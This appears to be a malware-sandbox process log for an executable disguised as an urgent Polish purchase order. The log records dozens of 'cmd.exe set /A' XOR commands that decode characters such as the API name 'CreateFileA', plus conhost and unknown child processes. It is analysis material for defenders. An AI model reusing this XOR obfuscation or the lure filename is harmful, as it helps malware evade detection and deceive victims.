            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x08^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0A^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x63^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x07^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0D^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x33^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x73^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x27^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
